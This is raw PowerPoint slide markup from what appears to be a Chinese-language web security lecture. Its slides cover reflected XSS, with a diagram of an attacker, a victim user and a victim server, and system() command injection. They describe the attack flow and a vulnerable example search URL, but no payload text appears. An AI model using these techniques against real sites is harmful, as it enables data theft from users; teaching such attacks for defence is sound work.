          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24580" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24581" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24582" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1524000"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24583" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552950"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24584" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1210588" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24586" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654175" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>点击链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>响应用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="3705225"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24590" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24591" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24592" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2880663" y="2749520"/>
            <a:ext cx="2236510" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送有价值的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24593" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3048000"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24594" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="4006850"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4160883" y="3866072"/>
            <a:ext cx="2535237" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送恶意脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1867649" y="5057249"/>
            <a:ext cx="1914570" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>反射</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>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0" y="454916"/>
            <a:ext cx="8520600" cy="763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a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Shape 80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1950720"/>
            <a:ext cx="4884976" cy="3096896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4884977" y="1950720"/>
            <a:ext cx="4054800" cy="4070564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>如果具有反射行为的网站接受用户输入，则：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>攻击者可以将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>代码放入输入中，所以当输入反射回来时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>代码将从网站注入到网页中。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259447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201540-E801-4268-8023-096E1B3D1D06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBB1B9F-AF8B-4BF4-873C-0CF07980ED4F}"/>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85800" y="4352271"/>
            <a:ext cx="8001000" cy="398745"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46204CDB-64DB-4813-8BBD-CBEC513832B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1566317"/>
            <a:ext cx="6586538" cy="1701036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA198375-AF22-4D72-8DF4-0244A3368FD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3900" y="5394391"/>
            <a:ext cx="7620000" cy="635630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01208D6-4EE9-4FE4-9E1B-9A9FD4050BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3888093"/>
            <a:ext cx="1447800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正常输入：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2044CF6A-FE92-4206-8EA1-FDE6538CAA7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="4933890"/>
            <a:ext cx="1447800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意输入：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB615BE5-30CC-4815-82A6-650123306585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019300" y="6399311"/>
            <a:ext cx="5334000" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://man7.org/tlpi/code/online/diff/procexec/system.c.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424799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321225" y="457200"/>
            <a:ext cx="8520600" cy="763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a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 87"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1479233"/>
            <a:ext cx="8520600" cy="4311967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假设网站上存在易受攻击的服务：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search?input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
